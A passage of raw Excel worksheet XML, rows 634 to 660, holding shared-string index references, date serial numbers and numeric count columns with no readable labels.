      <c r="R634">
        <v>761</v>
      </c>
      <c r="S634">
        <v>833</v>
      </c>
      <c r="T634">
        <v>9286</v>
      </c>
      <c r="U634">
        <v>30141</v>
      </c>
      <c r="V634">
        <v>52382</v>
      </c>
      <c r="W634" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="635" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A635" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B635" s="52">
        <v>43644.598832650459</v>
      </c>
      <c r="C635" s="95" t="s">
        <v>2160</v>
      </c>
      <c r="D635" s="96">
        <v>103</v>
      </c>
      <c r="E635" s="95" t="s">
        <v>2164</v>
      </c>
      <c r="F635" s="42">
        <v>100</v>
      </c>
      <c r="G635" s="95" t="s">
        <v>2165</v>
      </c>
      <c r="H635" t="s">
        <v>2166</v>
      </c>
      <c r="I635" t="s">
        <v>185</v>
      </c>
      <c r="J635" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K635" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L635" t="s">
        <v>77</v>
      </c>
      <c r="M635" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q635" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R635">
        <v>204</v>
      </c>
      <c r="S635">
        <v>295</v>
      </c>
      <c r="T635">
        <v>4016</v>
      </c>
      <c r="U635">
        <v>6321</v>
      </c>
      <c r="V635">
        <v>11652</v>
      </c>
      <c r="W635" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="636" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A636" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B636" s="52">
        <v>43644.598832673611</v>
      </c>
      <c r="C636" s="95" t="s">
        <v>2160</v>
      </c>
      <c r="D636" s="96">
        <v>103</v>
      </c>
      <c r="E636" s="95" t="s">
        <v>2167</v>
      </c>
      <c r="F636" s="42">
        <v>100</v>
      </c>
      <c r="G636" s="95" t="s">
        <v>44</v>
      </c>
      <c r="H636" t="s">
        <v>2168</v>
      </c>
      <c r="I636" t="s">
        <v>185</v>
      </c>
      <c r="J636" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K636" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L636" t="s">
        <v>77</v>
      </c>
      <c r="M636" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q636" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R636">
        <v>810083</v>
      </c>
      <c r="S636">
        <v>841425</v>
      </c>
      <c r="T636">
        <v>22365500</v>
      </c>
      <c r="U636">
        <v>29405581</v>
      </c>
      <c r="V636">
        <v>35310545</v>
      </c>
      <c r="W636" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="637" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A637" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B637" s="52">
        <v>43721.705608020835</v>
      </c>
      <c r="C637" s="95" t="s">
        <v>2169</v>
      </c>
      <c r="D637" s="96">
        <v>105</v>
      </c>
      <c r="E637" s="95" t="s">
        <v>2170</v>
      </c>
      <c r="F637" s="42">
        <v>103</v>
      </c>
      <c r="G637" s="95" t="s">
        <v>2171</v>
      </c>
      <c r="H637" t="s">
        <v>1074</v>
      </c>
      <c r="I637" t="s">
        <v>38</v>
      </c>
      <c r="J637" s="95" t="s">
        <v>38</v>
      </c>
      <c r="K637" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L637" t="s">
        <v>38</v>
      </c>
      <c r="M637" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N637" t="s">
        <v>38</v>
      </c>
      <c r="O637" s="95" t="s">
        <v>1661</v>
      </c>
      <c r="P637" t="s">
        <v>1691</v>
      </c>
      <c r="Q637" s="95" t="s">
        <v>2172</v>
      </c>
      <c r="R637">
        <v>1308</v>
      </c>
      <c r="S637">
        <v>881</v>
      </c>
      <c r="T637">
        <v>14105</v>
      </c>
      <c r="U637">
        <v>31279</v>
      </c>
      <c r="V637">
        <v>55684</v>
      </c>
      <c r="W637" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="638" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A638" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B638" s="52">
        <v>43721.705608032411</v>
      </c>
      <c r="C638" s="95" t="s">
        <v>2169</v>
      </c>
      <c r="D638" s="96">
        <v>105</v>
      </c>
      <c r="E638" s="95" t="s">
        <v>2173</v>
      </c>
      <c r="F638" s="42">
        <v>104</v>
      </c>
      <c r="G638" s="95" t="s">
        <v>2174</v>
      </c>
      <c r="H638" t="s">
        <v>2175</v>
      </c>
      <c r="I638" t="s">
        <v>38</v>
      </c>
      <c r="J638" s="95" t="s">
        <v>38</v>
      </c>
      <c r="K638" s="95" t="s">
        <v>38</v>
      </c>
      <c r="L638" t="s">
        <v>38</v>
      </c>
      <c r="M638" s="95" t="s">
        <v>38</v>
      </c>
      <c r="N638" t="s">
        <v>38</v>
      </c>
      <c r="O638" s="95" t="s">
        <v>2176</v>
      </c>
      <c r="P638" t="s">
        <v>1709</v>
      </c>
      <c r="Q638" s="95" t="s">
        <v>2172</v>
      </c>
      <c r="R638">
        <v>396</v>
      </c>
      <c r="S638">
        <v>346</v>
      </c>
      <c r="T638">
        <v>7665</v>
      </c>
      <c r="U638">
        <v>25591</v>
      </c>
      <c r="V638">
        <v>42697</v>
      </c>
      <c r="W638" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="639" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A639" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B639" s="52">
        <v>43802.501913888889</v>
      </c>
      <c r="C639" s="95" t="s">
        <v>2177</v>
      </c>
      <c r="D639" s="96">
        <v>1313</v>
      </c>
      <c r="E639" s="95" t="s">
        <v>2178</v>
      </c>
      <c r="F639" s="42">
        <v>107</v>
      </c>
      <c r="G639" s="95" t="s">
        <v>2179</v>
      </c>
      <c r="H639" t="s">
        <v>2180</v>
      </c>
      <c r="I639" t="s">
        <v>185</v>
      </c>
      <c r="J639" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K639" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L639" t="s">
        <v>77</v>
      </c>
      <c r="M639" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q639" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="W639" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="640" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A640" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B640" s="52">
        <v>44364.965841481484</v>
      </c>
      <c r="C640" s="95" t="s">
        <v>2181</v>
      </c>
      <c r="D640" s="96">
        <v>104</v>
      </c>
      <c r="E640" s="95" t="s">
        <v>2182</v>
      </c>
      <c r="F640" s="42">
        <v>104</v>
      </c>
      <c r="G640" s="95" t="s">
        <v>2183</v>
      </c>
      <c r="H640" t="s">
        <v>1074</v>
      </c>
      <c r="I640" t="s">
        <v>268</v>
      </c>
      <c r="J640" s="95" t="s">
        <v>269</v>
      </c>
      <c r="K640" s="95" t="s">
        <v>10</v>
      </c>
      <c r="L640" t="s">
        <v>77</v>
      </c>
      <c r="M640" s="95" t="s">
        <v>290</v>
      </c>
      <c r="N640" t="s">
        <v>291</v>
      </c>
      <c r="Q640" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R640">
        <v>43</v>
      </c>
      <c r="S640">
        <v>85</v>
      </c>
      <c r="T640">
        <v>905</v>
      </c>
      <c r="U640">
        <v>739</v>
      </c>
      <c r="V640">
        <v>1022</v>
      </c>
      <c r="W640" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="641" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A641" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B641" s="52">
        <v>43707.754125347223</v>
      </c>
      <c r="C641" s="95" t="s">
        <v>2075</v>
      </c>
      <c r="D641" s="96">
        <v>106</v>
      </c>
      <c r="E641" s="95" t="s">
        <v>2184</v>
      </c>
      <c r="F641" s="42">
        <v>100</v>
      </c>
      <c r="G641" s="95" t="s">
        <v>2185</v>
      </c>
      <c r="H641" t="s">
        <v>2186</v>
      </c>
      <c r="I641" t="s">
        <v>156</v>
      </c>
      <c r="J641" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K641" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L641" t="s">
        <v>77</v>
      </c>
      <c r="M641" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N641" t="s">
        <v>476</v>
      </c>
      <c r="Q641" s="95" t="s">
        <v>2079</v>
      </c>
      <c r="W641" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="642" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A642" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B642" s="52">
        <v>43791.132544571759</v>
      </c>
      <c r="C642" s="95" t="s">
        <v>2187</v>
      </c>
      <c r="D642" s="96">
        <v>110</v>
      </c>
      <c r="E642" s="95" t="s">
        <v>2188</v>
      </c>
      <c r="F642" s="42">
        <v>110</v>
      </c>
      <c r="G642" s="95" t="s">
        <v>2189</v>
      </c>
      <c r="H642" t="s">
        <v>2190</v>
      </c>
      <c r="I642" t="s">
        <v>156</v>
      </c>
      <c r="J642" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K642" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L642" t="s">
        <v>77</v>
      </c>
      <c r="M642" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N642" t="s">
        <v>476</v>
      </c>
      <c r="Q642" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R642">
        <v>307</v>
      </c>
      <c r="S642">
        <v>283</v>
      </c>
      <c r="T642">
        <v>9505</v>
      </c>
      <c r="U642">
        <v>17756</v>
      </c>
      <c r="V642">
        <v>25535</v>
      </c>
      <c r="W642" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="643" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A643" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B643" s="52">
        <v>43581.484275254632</v>
      </c>
      <c r="C643" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D643" s="96">
        <v>114</v>
      </c>
      <c r="E643" s="95" t="s">
        <v>2192</v>
      </c>
      <c r="F643" s="42">
        <v>105</v>
      </c>
      <c r="G643" s="95" t="s">
        <v>2193</v>
      </c>
      <c r="H643" t="s">
        <v>2194</v>
      </c>
      <c r="I643" t="s">
        <v>185</v>
      </c>
      <c r="J643" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K643" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L643" t="s">
        <v>77</v>
      </c>
      <c r="M643" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q643" s="95" t="s">
        <v>2195</v>
      </c>
      <c r="T643">
        <v>2622</v>
      </c>
      <c r="U643">
        <v>4319</v>
      </c>
      <c r="V643">
        <v>10033</v>
      </c>
      <c r="W643" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="644" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A644" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B644" s="52">
        <v>44127.150470520835</v>
      </c>
      <c r="C644" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D644" s="96">
        <v>202</v>
      </c>
      <c r="E644" s="95" t="s">
        <v>2192</v>
      </c>
      <c r="F644" s="42">
        <v>107</v>
      </c>
      <c r="G644" s="95" t="s">
        <v>2193</v>
      </c>
      <c r="H644" t="s">
        <v>2194</v>
      </c>
      <c r="I644" t="s">
        <v>185</v>
      </c>
      <c r="J644" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K644" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L644" t="s">
        <v>77</v>
      </c>
      <c r="M644" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q644" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="T644">
        <v>6075828</v>
      </c>
      <c r="U644">
        <v>8275364</v>
      </c>
      <c r="V644">
        <v>9872008</v>
      </c>
      <c r="W644" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="645" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A645" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B645" s="52">
        <v>43663.648928819443</v>
      </c>
      <c r="C645" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D645" s="96">
        <v>114</v>
      </c>
      <c r="E645" s="95" t="s">
        <v>2196</v>
      </c>
      <c r="F645" s="42">
        <v>101</v>
      </c>
      <c r="G645" s="95" t="s">
        <v>2197</v>
      </c>
      <c r="H645" t="s">
        <v>2198</v>
      </c>
      <c r="I645" t="s">
        <v>185</v>
      </c>
      <c r="J645" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K645" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L645" t="s">
        <v>77</v>
      </c>
      <c r="M645" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q645" s="95" t="s">
        <v>2195</v>
      </c>
      <c r="U645">
        <v>3</v>
      </c>
      <c r="V645">
        <v>6343</v>
      </c>
      <c r="W645" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="646" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A646" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B646" s="52">
        <v>44127.150470578701</v>
      </c>
      <c r="C646" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D646" s="96">
        <v>202</v>
      </c>
      <c r="E646" s="95" t="s">
        <v>2196</v>
      </c>
      <c r="F646" s="42">
        <v>102</v>
      </c>
      <c r="G646" s="95" t="s">
        <v>2197</v>
      </c>
      <c r="H646" t="s">
        <v>2198</v>
      </c>
      <c r="I646" t="s">
        <v>185</v>
      </c>
      <c r="J646" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K646" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L646" t="s">
        <v>77</v>
      </c>
      <c r="M646" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q646" s="95" t="s">
        <v>2195</v>
      </c>
      <c r="R646">
        <v>18102</v>
      </c>
      <c r="S646">
        <v>22313</v>
      </c>
      <c r="T646">
        <v>503801</v>
      </c>
      <c r="U646">
        <v>574539</v>
      </c>
      <c r="V646">
        <v>648194</v>
      </c>
      <c r="W646" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="647" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A647" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B647" s="52">
        <v>43663.648928796298</v>
      </c>
      <c r="C647" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D647" s="96">
        <v>114</v>
      </c>
      <c r="E647" s="95" t="s">
        <v>2199</v>
      </c>
      <c r="F647" s="42">
        <v>101</v>
      </c>
      <c r="G647" s="95" t="s">
        <v>2200</v>
      </c>
      <c r="H647" t="s">
        <v>2201</v>
      </c>
      <c r="I647" t="s">
        <v>185</v>
      </c>
      <c r="J647" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K647" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L647" t="s">
        <v>77</v>
      </c>
      <c r="M647" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q647" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="T647">
        <v>2619</v>
      </c>
      <c r="U647">
        <v>4316</v>
      </c>
      <c r="V647">
        <v>10029</v>
      </c>
      <c r="W647" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="648" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A648" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B648" s="52">
        <v>44127.150470555556</v>
      </c>
      <c r="C648" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D648" s="96">
        <v>202</v>
      </c>
      <c r="E648" s="95" t="s">
        <v>2199</v>
      </c>
      <c r="F648" s="42">
        <v>102</v>
      </c>
      <c r="G648" s="95" t="s">
        <v>2200</v>
      </c>
      <c r="H648" t="s">
        <v>2201</v>
      </c>
      <c r="I648" t="s">
        <v>185</v>
      </c>
      <c r="J648" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K648" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L648" t="s">
        <v>77</v>
      </c>
      <c r="M648" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q648" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R648">
        <v>152184</v>
      </c>
      <c r="S648">
        <v>155153</v>
      </c>
      <c r="T648">
        <v>3722015</v>
      </c>
      <c r="U648">
        <v>5605308</v>
      </c>
      <c r="V648">
        <v>6190936</v>
      </c>
      <c r="W648" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="649" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A649" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B649" s="52">
        <v>43672.605824351849</v>
      </c>
      <c r="C649" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D649" s="96">
        <v>114</v>
      </c>
      <c r="E649" s="95" t="s">
        <v>2202</v>
      </c>
      <c r="F649" s="42">
        <v>103</v>
      </c>
      <c r="G649" s="95" t="s">
        <v>2203</v>
      </c>
      <c r="H649" t="s">
        <v>2204</v>
      </c>
      <c r="I649" t="s">
        <v>185</v>
      </c>
      <c r="J649" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K649" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L649" t="s">
        <v>77</v>
      </c>
      <c r="M649" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q649" s="95" t="s">
        <v>2195</v>
      </c>
      <c r="U649">
        <v>3</v>
      </c>
      <c r="V649">
        <v>6345</v>
      </c>
      <c r="W649" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="650" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A650" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B650" s="52">
        <v>44127.150470590277</v>
      </c>
      <c r="C650" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D650" s="96">
        <v>202</v>
      </c>
      <c r="E650" s="95" t="s">
        <v>2202</v>
      </c>
      <c r="F650" s="42">
        <v>104</v>
      </c>
      <c r="G650" s="95" t="s">
        <v>2203</v>
      </c>
      <c r="H650" t="s">
        <v>2204</v>
      </c>
      <c r="I650" t="s">
        <v>185</v>
      </c>
      <c r="J650" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K650" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L650" t="s">
        <v>77</v>
      </c>
      <c r="M650" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q650" s="95" t="s">
        <v>2195</v>
      </c>
      <c r="R650">
        <v>9049</v>
      </c>
      <c r="S650">
        <v>8592</v>
      </c>
      <c r="T650">
        <v>152037</v>
      </c>
      <c r="U650">
        <v>287411</v>
      </c>
      <c r="V650">
        <v>307751</v>
      </c>
      <c r="W650" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="651" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A651" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B651" s="52">
        <v>43571.43165849537</v>
      </c>
      <c r="C651" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D651" s="96">
        <v>114</v>
      </c>
      <c r="E651" s="95" t="s">
        <v>2205</v>
      </c>
      <c r="F651" s="42">
        <v>106</v>
      </c>
      <c r="G651" s="95" t="s">
        <v>2206</v>
      </c>
      <c r="H651" t="s">
        <v>2207</v>
      </c>
      <c r="I651" t="s">
        <v>185</v>
      </c>
      <c r="J651" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K651" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L651" t="s">
        <v>77</v>
      </c>
      <c r="M651" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q651" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="T651">
        <v>2621</v>
      </c>
      <c r="U651">
        <v>4313</v>
      </c>
      <c r="V651">
        <v>4463</v>
      </c>
      <c r="W651" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="652" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A652" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B652" s="52">
        <v>44127.150470601853</v>
      </c>
      <c r="C652" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D652" s="96">
        <v>202</v>
      </c>
      <c r="E652" s="95" t="s">
        <v>2205</v>
      </c>
      <c r="F652" s="42">
        <v>201</v>
      </c>
      <c r="G652" s="95" t="s">
        <v>2206</v>
      </c>
      <c r="H652" t="s">
        <v>2207</v>
      </c>
      <c r="I652" t="s">
        <v>185</v>
      </c>
      <c r="J652" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K652" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L652" t="s">
        <v>77</v>
      </c>
      <c r="M652" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q652" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R652">
        <v>191930</v>
      </c>
      <c r="S652">
        <v>204974</v>
      </c>
      <c r="T652">
        <v>4214475</v>
      </c>
      <c r="U652">
        <v>6780818</v>
      </c>
      <c r="V652">
        <v>7608985</v>
      </c>
      <c r="W652" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="653" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A653" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B653" s="52">
        <v>43644.657267199073</v>
      </c>
      <c r="C653" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D653" s="96">
        <v>114</v>
      </c>
      <c r="E653" s="95" t="s">
        <v>2208</v>
      </c>
      <c r="F653" s="42">
        <v>106</v>
      </c>
      <c r="G653" s="95" t="s">
        <v>2209</v>
      </c>
      <c r="H653" t="s">
        <v>2210</v>
      </c>
      <c r="I653" t="s">
        <v>185</v>
      </c>
      <c r="J653" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K653" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L653" t="s">
        <v>77</v>
      </c>
      <c r="M653" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q653" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="W653" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="654" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A654" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B654" s="52">
        <v>44127.15047054398</v>
      </c>
      <c r="C654" s="95" t="s">
        <v>2191</v>
      </c>
      <c r="D654" s="96">
        <v>202</v>
      </c>
      <c r="E654" s="95" t="s">
        <v>2208</v>
      </c>
      <c r="F654" s="42">
        <v>107</v>
      </c>
      <c r="G654" s="95" t="s">
        <v>2209</v>
      </c>
      <c r="H654" t="s">
        <v>2210</v>
      </c>
      <c r="I654" t="s">
        <v>185</v>
      </c>
      <c r="J654" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K654" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L654" t="s">
        <v>77</v>
      </c>
      <c r="M654" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q654" s="95" t="s">
        <v>2195</v>
      </c>
      <c r="W654" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="655" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A655" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B655" s="52">
        <v>44292.082165092594</v>
      </c>
      <c r="C655" s="95" t="s">
        <v>2211</v>
      </c>
      <c r="D655" s="96">
        <v>120</v>
      </c>
      <c r="E655" s="95" t="s">
        <v>2212</v>
      </c>
      <c r="F655" s="42">
        <v>120</v>
      </c>
      <c r="G655" s="95" t="s">
        <v>2213</v>
      </c>
      <c r="H655" t="s">
        <v>2214</v>
      </c>
      <c r="I655" t="s">
        <v>156</v>
      </c>
      <c r="J655" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K655" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L655" t="s">
        <v>77</v>
      </c>
      <c r="M655" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N655" t="s">
        <v>476</v>
      </c>
      <c r="Q655" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R655">
        <v>13673</v>
      </c>
      <c r="S655">
        <v>13128</v>
      </c>
      <c r="T655">
        <v>212405</v>
      </c>
      <c r="U655">
        <v>367010</v>
      </c>
      <c r="V655">
        <v>412860</v>
      </c>
      <c r="W655" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="656" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A656" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B656" s="52">
        <v>44292.08282974537</v>
      </c>
      <c r="C656" s="95" t="s">
        <v>2215</v>
      </c>
      <c r="D656" s="96">
        <v>120</v>
      </c>
      <c r="E656" s="95" t="s">
        <v>2216</v>
      </c>
      <c r="F656" s="42">
        <v>120</v>
      </c>
      <c r="G656" s="95" t="s">
        <v>2217</v>
      </c>
      <c r="H656" t="s">
        <v>2218</v>
      </c>
      <c r="I656" t="s">
        <v>156</v>
      </c>
      <c r="J656" s="95" t="s">
        <v>301</v>
      </c>
      <c r="K656" s="95" t="s">
        <v>26</v>
      </c>
      <c r="L656" t="s">
        <v>77</v>
      </c>
      <c r="M656" s="95" t="s">
        <v>475</v>
      </c>
      <c r="N656" t="s">
        <v>476</v>
      </c>
      <c r="Q656" s="95" t="s">
        <v>2111</v>
      </c>
      <c r="R656">
        <v>11186</v>
      </c>
      <c r="S656">
        <v>10763</v>
      </c>
      <c r="T656">
        <v>171282</v>
      </c>
      <c r="U656">
        <v>290779</v>
      </c>
      <c r="V656">
        <v>329890</v>
      </c>
      <c r="W656" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="657" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A657" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B657" s="52">
        <v>43663.662263425926</v>
      </c>
      <c r="C657" s="95" t="s">
        <v>2177</v>
      </c>
      <c r="D657" s="96">
        <v>1313</v>
      </c>
      <c r="E657" s="95" t="s">
        <v>2219</v>
      </c>
      <c r="F657" s="42">
        <v>106</v>
      </c>
      <c r="G657" s="95" t="s">
        <v>2220</v>
      </c>
      <c r="H657" t="s">
        <v>2221</v>
      </c>
      <c r="I657" t="s">
        <v>185</v>
      </c>
      <c r="J657" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K657" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L657" t="s">
        <v>77</v>
      </c>
      <c r="M657" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q657" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="U657">
        <v>3</v>
      </c>
      <c r="V657">
        <v>6344</v>
      </c>
      <c r="W657" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="658" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A658" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B658" s="52">
        <v>43663.66226341435</v>
      </c>
      <c r="C658" s="95" t="s">
        <v>2177</v>
      </c>
      <c r="D658" s="96">
        <v>1313</v>
      </c>
      <c r="E658" s="95" t="s">
        <v>2222</v>
      </c>
      <c r="F658" s="42">
        <v>105</v>
      </c>
      <c r="G658" s="95" t="s">
        <v>2223</v>
      </c>
      <c r="H658" t="s">
        <v>2224</v>
      </c>
      <c r="I658" t="s">
        <v>185</v>
      </c>
      <c r="J658" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K658" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L658" t="s">
        <v>77</v>
      </c>
      <c r="M658" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q658" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R658">
        <v>82</v>
      </c>
      <c r="S658">
        <v>54</v>
      </c>
      <c r="T658">
        <v>1180</v>
      </c>
      <c r="U658">
        <v>2028</v>
      </c>
      <c r="V658">
        <v>8587</v>
      </c>
      <c r="W658" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="659" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A659" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B659" s="52">
        <v>43669.752765289355</v>
      </c>
      <c r="C659" s="95" t="s">
        <v>2177</v>
      </c>
      <c r="D659" s="96">
        <v>1313</v>
      </c>
      <c r="E659" s="95" t="s">
        <v>2225</v>
      </c>
      <c r="F659" s="42">
        <v>103</v>
      </c>
      <c r="G659" s="95" t="s">
        <v>2226</v>
      </c>
      <c r="H659" t="s">
        <v>2227</v>
      </c>
      <c r="I659" t="s">
        <v>185</v>
      </c>
      <c r="J659" s="95" t="s">
        <v>186</v>
      </c>
      <c r="K659" s="95" t="s">
        <v>22</v>
      </c>
      <c r="L659" t="s">
        <v>77</v>
      </c>
      <c r="M659" s="95" t="s">
        <v>1831</v>
      </c>
      <c r="Q659" s="95" t="s">
        <v>2085</v>
      </c>
      <c r="R659">
        <v>9558</v>
      </c>
      <c r="S659">
        <v>8918</v>
      </c>
      <c r="T659">
        <v>187478</v>
      </c>
      <c r="U659">
        <v>302564</v>
      </c>
      <c r="V659">
        <v>347959</v>
      </c>
      <c r="W659" t="s">
        <v>2080</v>
      </c>
    </row>
    <row r="660" spans="1:23" x14ac:dyDescent="0.35">
      <c r="A660" s="95" t="s">
        <v>3</v>
      </c>
      <c r="B660" s="52">
        <v>43719.397825092594</v>
      </c>
      <c r="C660" s="95" t="s">
        <v>2177</v>
      </c>
      <c r="D660" s="96">
        <v>1313</v>
      </c>
      <c r="E660" s="95" t="s">
        <v>2228</v>
      </c>
      <c r="F660" s="42">
        <v>107</v>
      </c>
      <c r="G660" s="95" t="s">
        <v>2229</v>
      </c>
      <c r="H660" t="s">
        <v>2230</v>
      </c>
      <c r="I660" t="s">
